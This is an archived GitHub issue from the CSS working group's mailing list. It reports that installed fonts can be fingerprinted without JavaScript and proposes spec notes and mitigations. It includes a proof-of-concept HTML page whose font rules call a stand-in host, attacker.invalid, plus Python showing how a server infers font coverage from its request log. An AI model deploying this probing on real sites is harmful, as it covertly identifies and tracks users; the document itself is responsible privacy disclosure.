[csswg-drafts] [css-fonts] JS-free probing of Unicode support of fonts (#5578) from quasicomputational via GitHub on 2020-10-04 (public-css-archive@w3.org from October 2020)

From: quasicomputational via GitHub <sysbot+gh@w3.org>
Date: Sun, 04 Oct 2020 08:58:32 +0000
To: public-css-archive@w3.org
Message-ID: <issues.opened-714268696-1601801910-sysbot+gh@w3.org>

quasicomputational has just created a new issue for https://github.com/w3c/csswg-drafts:

== [css-fonts] JS-free probing of Unicode support of fonts ==
The spec currently says this about fingerprinting (https://drafts.csswg.org/css-fonts/#sp201):

> An attacker may obtain fingerprinting information by querying the Installed Fonts. In contrast to older technologies (notably Adobe Flash, which provided a complete list of Installed Fonts and sent this information in HTTP headers) such probing must be done one font at a time, providing the font family name and then checking via script whether the font was loaded. This takes time, and checking for more than a few hundred fonts introduces a noticeable delay in page rendering.

This is, however, not accurate: an attacker can conduct a certain amount of probing without JS, only using CSS, by selectively downloading webfonts depending on whether the user has a font by a certain name that supports a certain character. An example speaks a thousand words (or, in this case, two):

```html
<!DOCTYPE html>
<meta charset=utf-8>
<style>
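  /* Each probe face is fetched only if a character in its unicode-range
     appears on the page and no earlier family in the stack can render it. */
  @font-face {
    font-family: NonExistentGrek;
    src: url(https://attacker.invalid/grek);
    unicode-range: U+0370-03FF; /* Greek and Coptic */
  }
  @font-face {
    font-family: NonExistentHebr;
    src: url(https://attacker.invalid/hebr);
    unicode-range: U+0590-05FF; /* Hebrew */
  }
  :root {
    /* The font under test comes first; the probes act as fallbacks. */
    font-family: monospace, NonExistentGrek, NonExistentHebr;
  }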
</style>
χαίρετε! שלום!
```

If you load that HTML with devtools open, you may see zero, one, or two failed font requests, depending on what your monospace font is. This can be used to discover precisely which characters an installed font supports, and that set of characters is quite likely to be unique amongst fonts.
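
To make the inference concrete, here is a rough sketch of what the attacker's server could do with its request log for the example above. The `PROBES` mapping, the `infer_coverage` name, and the idea that the log is just a list of requested paths are all illustrative assumptions on my part, not anything from the spec.

```python
# Hypothetical mapping from probe URL path to the Unicode range it guards.
# The ranges mirror the unicode-range descriptors in the HTML example.
PROBES = {
    "/grek": (0x0370, 0x03FF),  # Greek and Coptic
    "/hebr": (0x0590, 0x05FF),  # Hebrew
}


def infer_coverage(requested_paths):
    """Map each probe path to True if the visitor's font appears to cover it.

    A probe that was NOT requested means an earlier family in the stack
    already rendered the page's characters from that range, so the UA never
    needed the webfont. This only tells us about the characters actually
    present on the page, not the whole range.
    """
    requested = set(requested_paths)
    return {path: path not in requested for path in PROBES}


# A visitor whose monospace font has Greek but not Hebrew requests only /hebr.
print(infer_coverage(["/hebr"]))  # {'/grek': True, '/hebr': False}
```

Narrowing each probe's `unicode-range` and the page text down to a single character would give per-character resolution, at the cost of one `@font-face` rule per character.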

If scripting is available, this attack is (mostly) inferior to actively probing with JS. There is some residual advantage in checking in parallel and having the browser do the work for you, but I wouldn't think that makes up for the loss in resolution and the added complexity.

However, in privacy-sensitive contexts, scripting is likely not available because of the hundreds of other scary things it can do, and this may be a genuinely concerning information leak.

At the same time, this pattern is useful for only incurring the cost of a font download when it's needed to support some characters. Leaking font information trades off very harshly against efficiency - basically, the same trade-off that UAs already face when considering requests that are conditional on media queries (#3488).

The spec already has text talking about privacy budgets and UAs minimising font variance to reduce fingerprintability, which applies fine to this attack as well. I think that there are two changes I would like to see:
* First, a note in § 12.1 'What information might this feature expose...' that JS is not required for probing, so that this sort of thing is on UAs' radar for reducing fingerprintability.
* Second, a description of another potential mitigation: fetching the fonts referenced by every `@font-face` rule, regardless of whether they're actually needed.
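
As a toy model of that second mitigation (not how any real UA implements font loading), the difference comes down to whether the set of requests depends on what the installed fonts could not render. `FontFace`, `fonts_to_fetch`, and the `fetch_all` flag are hypothetical names used only for this sketch.

```python
from typing import NamedTuple


class FontFace(NamedTuple):
    url: str
    first: int  # start of unicode-range, inclusive
    last: int   # end of unicode-range, inclusive


def fonts_to_fetch(faces, uncovered_chars, fetch_all=False):
    """Return the URLs a UA would request under this simplified model.

    uncovered_chars: characters on the page that no earlier family in the
    stack could render. With fetch_all=True they are ignored entirely, so
    the request pattern says nothing about installed fonts.
    """
    if fetch_all:
        return [face.url for face in faces]
    return [
        face.url
        for face in faces
        if any(face.first <= ord(c) <= face.last for c in uncovered_chars)
    ]


faces = [FontFace("/grek", 0x0370, 0x03FF), FontFace("/hebr", 0x0590, 0x05FF)]
hebrew = "\u05e9\u05dc\u05d5\u05dd"  # the Hebrew word from the example page

print(fonts_to_fetch(faces, hebrew))                  # ['/hebr']
print(fonts_to_fetch(faces, hebrew, fetch_all=True))  # ['/grek', '/hebr']
```

The second call returns the same list whatever `uncovered_chars` is, which is the point of the mitigation; the price is downloading fonts that may never be used.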

This is related to the broader issue of font fingerprinting vectors (#4055), but I wanted to open a specific issue for this attack because the spec's text, as written, is wrong.

Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5578 using your GitHub account



Received on Sunday, 4 October 2020 08:58:34 UTC